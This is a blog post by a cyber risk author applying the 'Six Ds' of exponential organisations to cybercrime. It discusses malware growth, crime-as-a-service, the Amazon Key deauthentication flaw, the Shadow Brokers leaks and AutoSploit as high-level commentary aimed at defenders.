As anyone who has spent five minutes with me knows, I have written a book outlining some of the common challenges of cyber risk management. In the aforementioned foray into publishing, I touch on the ‘Six Ds of an exponential organisation’ – a definition brought to prominence by Peter Diamantis and latterly Salim Ismail. I am going to be honest, when I wrote the 6Ds in ‘Cyber Risk Management’, I did so to highlight the profound change in the characteristics of organisations in the 21st century. I thought it was important to highlight how technology has driven a way of working that has not been seen previously. In analysing the 6Ds of exponential organisations, I noticed how applicable these characteristics were to cybersecurity. So, rather than insist on an increased word count in the book, I though it prudent to add my views to the ‘matters blog site!
Let’s explore how trends in cyber are tracking broader societal and enterprise trends. By applying Diamandis’ 6Ds, it shows us that cybercrime, as an industry, clearly evidences that it is an exponential business. I am unsure if we are yet to reach the ‘knee of the curve’ (check out chapter 1) but there are figures which evidence significant growth across several salient categorisations.
Few could argue that crime has ‘gone digital’. In my MSc thesis, I wrote about the concept of e-crime. The denotation and delineation of crime from its electronic cousin. In 2019, such a separation of traditional crime from a digital or electronic variety simply isn’t necessary. The UK Information Commissioner making similar statements in an interview with The Guardian, asserting that ‘data crimes are real crimes’ (Cadwalladr, 2018). A statement in support of the fines bestowed upon Facebook for data misuse and their part in the Cambridge Analytica scandal. As we explored earlier in this chapter, we have crimes exacerbated by digital means: fraud, exploitation, etc but these are crimes which have existed for millennia.
Cybercrime has, however, become truly ‘digital’. Few would suggest otherwise. Could we imagine crimes such as denial of service occurring in a world pre the technological advancements? Cryptojacking, the unwitting mining of digital currency through idle machine resources, is case in point. An entirely new wave of crime facilitated by computing to create somewhat intangible, digital currency.
We also have crimes which were previously carried out in person have been ‘digitally enabled’. Few would call fraud a cyber-crime but few would argue that fraud has become immeasurably easier with the introduction of email and the world-wide-web. Consider ATM card skimming; it used to be an activity carrying a high likelihood of detection as ‘skimmers’ needed to be added to ATMs, our online world has created skimming 2.0 where an attacker can achieve the same outcome without the need for physical hardware (Pauli, 2016). The attacker simply needs to install malicious software on a vulnerable web server and wait for the card numbers to arrive in their inbox.
I think we would all agree that cybersecurity introduces issues with visibility through the exponential growth of cybercrime. The seemingly imperceptible difference between linear and exponential growth, until the ‘knee of the curve’ is reached. In a business context, missing the identification of exponential growth could result in missing first-mover advantage or an ineffective and reactive business strategy. In a cybersecurity context, the result is a potential misrepresentation of the seriousness and prevalence of cyber threats.
Malware volumes continue to grow. The AV-Test Institute registers over 250,000 new malicious files every single day (AV-Test, 2018). The past ten years have evidenced exponential growth of total malware seen. From approximately 25 million samples in 2009, through to 750,000,000 (and counting) in 2018. Less perceptible is the increase between 2009 through 2012 (100 million), still exponential, but ostensibly manageable.
The deceptive growth of total malware volumes presents a considerable challenge for the defender. In 2009, with the paltry sum of 25 million malware samples, companies were (semi) reliably using anti-virus solutions based almost exclusively on signatures. For those not familiar with AV parlance, think of a signature as a static identifier of a file, a checksum (in the form of a one-way hash function) which is processed on a file. The de-facto algorithm being MD5, which creates a 128-bit/16 byte hash.
The challenge with a signature-based prevention system is that the defender has to have seen the file before. In 2009, many enterprise security models were predicated on an ability to tell good from bad. We applied this to malware samples, DLP dictionaries and URL filtering rules but the sheer volume of malware samples, phishing sites and exploit kits means that operations teams are overloaded and technical solutions are falling behind. We add into the melting pot the issues of polymorphism and Fast Flux DNS and our entire security model is broken. Signatures are critically important as a mechanism to detect and respond to cyberattacks, but the dynamic nature of modern malware means that their use as a preventative control is increasingly ineffective.
So, what is disruption? For me, it’s the creation of a new market and the displacement of existing players. The entire crime ecosystem has been transformed over the past ten years. Ismail (2014) speaks about ExOs having a Massive Transformation Purpose (MTP) which is intrinsically associated with a company’s ability to disrupt.
We have certainly experienced disruption in the cybercrime arena and in very similar ways to more legitimate organisations. This ‘next-generation of cybercrime’ is being carried out by highly organised, intelligent syndicates with a focus on customer service and quality. The services which have disrupted the taxi, music and photographic industries are being leveraged for criminal purposes. The ‘as-a-service’ model we have seen adopted across leading companies in all verticals are modified for nefarious purposes.
DDoS as a service, malware as a service, password cracking as a service are all services available to those with limited budgets and access to a ToR client. In the same way that SaaS and IaaS solutions bring the Small or Medium Enterprises (SMEs) with carrier-grade infrastructure and security solutions, the ‘as a service’ cybercrime model gives the ‘petty criminal’ access to best-of-breed hacking tools and network stressing services.
The mobile phone demonetised so many everyday items. Very few of us carry a flashlight, a compass and map, a video camera or a restaurant review guide. These are services delivered through the modern mobile phone. The photo printing industry was entirely demonetised through digital photography and the nominal costs associated with file storage. The capabilities mentioned above are now delivered through digital versions of previously tangible items.
Cybercrime, well, crime per se has not avoided being demonetised. We need to look no further that one of the oldest threat events in the book to see this: lock picking. In a traditional sense, there are time and money implications of lock picking. We have all seen the classic movies where the bad guys and good can pick the locks of government research facilities, safety deposit boxes and apartment blocks. If we ignore the implausibly easy method of using a credit card, most lock picking endeavours require a lock-picking kit, tension tools, extractors and a significant amount of trial and error. Surely, we cannot demonetise lock picking, or so I thought.
IoT facilitates the ushering in of a new level of convenience. Until recently, one of the drawbacks of internet shopping was the fact that someone had to be at home to receive your goods. Few things irritate the average human than the little red postcard left by the Royal Mail to politely inform you that your ‘parcel can be collected from the depot’ as no one was home. You could write off the following Saturday morning, queuing at the Post Office, followed by the anti-climax when you realise what you thought would be your new golf clubs are, in fact, another pair of shoes your wife has ordered. The process was slow, time-consuming and costly (for all). Companies like Amazon realised that the model was broken, and it could be ‘fixed’ through technology.
Enter Amazon Key, a “Keyless Entry, Guest Access, and Optional In-Home Delivery” (Amazon, 2018) system. Amazon Key allows deliveries to be received without requiring someone to be at home, what’s not to like? In fact, Amazon Key provides a similar service, allowing deliveries to your car. The benefits of a digitised lock and house access system are apparent although, as with most systems which provide convenience, we have to concede on the security front.
No sooner than the Amazon Key was on general release, researchers and hackers alike had uncovered vulnerabilities which demonetise the lockpicking business. A primary lock-picking drawback for the would-be criminal is locality: until now, picking a lock requires the attacker to be in proximity to the lock. The risk-v-reward dichotomy being salient – picking a lock carries a high likelihood of being caught. In a world where locks and door entry is controlled through software and internet connected devices, the criminal can access a victim’s house with nothing more than a Raspberry Pi. At some point, going onsite is required for physical theft, but this is made immeasurably easier through an open door.
In late 2017, Amazon had to release an emergency security patch to the Key system after researchers at Rhino Security Labs discovered a method of flooding the local network with ‘deauthorisation packets’. This availability-based event results in Amazon’s Cloud Cam (an integral component of the Key architecture) displaying only the last image seen and preventing the door from locking.
Now, I have warned of the dangers of cyber-sensationalism. In efforts to apply practical security advice, we should remember that this attack was identified by a researcher, not an ‘in the wild’ attack. The attack also carries a short window of opportunity and a high likelihood of subsequent detection given that the blocking of a signal requires a continuous flow of data packets and that the Amazon Key timestamps all opening and closings of the lock.
Amazon provided a software update expediently. The update provides alerts if a camera goes offline for any period. A barrage of warnings could prove annoying for the average user, reinforcing a feeling of security-apathy. Wi-Fi networks regularly drop connectivity and being alerted on every occasion this may leave users ignoring actual incidents which require attention. Amazon provided a formal company response which served to placate consumer and media concerns.
The Amazon Key example illustrates several concepts which we will explore across future chapters:
- Technological advancements which rely on software and computing networking provide new and demonetised methods of carrying out criminal activity.
- Vulnerabilities in software will always be discovered – expediency of security updates is critical.
- Incendiary media headlines, once contextualised, often actually cover a more mundane vulnerability with compensating or mitigating controls.
I have written previously about the challenges of card skimming in a digital world. Cloning physical credit cards requires proximity (to cards) and manual processes. Thieves are shifting to another form of demonetisation to obtain card records by injecting card skimming malware into e-commerce sites via vulnerable plugins. The opportunities are infinite for demonetisation in cybercrime.
The Shadow Brokers is a hacker group who rose to infamy in mid-2016 with a tweet from the @shadowbrokerss Twitter account. The succinct message advertised a Pastebin page which offered a smorgasbord of malware tools, available to the highest bidder. The leak was a treasure trove of malware tools and zero-day exploits stolen from the Equation Group, purportedly a sub-group of the NSA’s Tailored Access Operations (TAO) organisation.
In April 2017, The Shadow Brokers adapted their business model; they made their leaks free to the general public. A true democratisation of software. Suddenly, anyone with an internet connection had access to some of the most potent cyber exploits available today. This action, and many like it (the Mirai botnet source-code was uploaded online) seismically move the goalpost of cyber defence. Over the years, many a CISO has uttered the words ‘we do not need to worry about all these nation-state actors, we having nothing that they want to steal’. Historically, this reasoning made sense. Why would a small retail outlet with an e-commerce platform need to employ controls to protect themselves from state espionage and hacking? Firstly, the costs were too high and the likelihood too low. Well, put the tools of a nation-state in the hands of everyone and overnight, sophisticated and state-sponsored becomes convenient and cost-effective. We have a situation where the less skilled can simply repackage existing exploits. We’re seeing democratisation and commoditisation of cyber-weapons.
Automation and commoditisation aren’t the exclusive reserve of nation-state exploits being released. Stress testing tools for DDoS, malware-as-a-service and dark-web selling of user credentials and payment cards shows that information and tools are available at a price point appealing for the masses. I remember a keynote I gave at a conference in Dublin, Ireland. The focus of the session was the criminal infrastructure and supporting services associated with crypto-ransomware. I provided examples of malware democratisation. As an example, in 2013 it would cost would-be criminals thousands of dollars to acquire CryptoLocker ransomware, by late 2016 it was possible to pick up a ‘Stampado’ malware for $40 dollars. Wow! If you’re thinking of getting into the profession of the cybercriminal, you might think twice at shelling out thousands of dollars, but at $40 what does the would-be criminal have to lose? Organised criminals took advantage of a service-based model and provided services to the masses through the same technologies which have provided commercial benefits to legitimate businesses.
In early 2018, while perusing GitHub, I remember coming across the epitome of democratisation. The aggregation of several democratised services exacerbating the point-and-click nature of the tools which script-kiddies use to wreak havoc on an ill-equipped, under-prepared enterprise. The tool in question was AutoSploit and, as the author puts it, “AutoSploit attempts to automate the exploitation of remote hosts” (GitHub, 2018) and it does this through Python scripting which takes the output of Shodan queries and provides these as input into MetaSploit. The specifics of these tools are not within the scope of this book but AutoSploit took two already relatively automated tools which required little technical expertise and made them trivial to operate. I assert that we will continue to see an increase in automated hacking tools. This is where a fine line exists between tools which are for the good of our industry and democratised hacking vehicles. Shodan, MetaSploit and AutoSploit were all created with the noble goal of making our industry safer, by cybersecurity professionals, for cybersecurity professionals; although the same tools which can be used for good can be repurposed in a heartbeat and used for nefarious actions.
In closing, think about cybercrime as a business. Those who are successful run businesses which are representative of other organisations of prominence and success: agile, structured and resilient. We must design defences for the threat events of today and better understand the tools, techniques and procedures of the modern cyber criminal.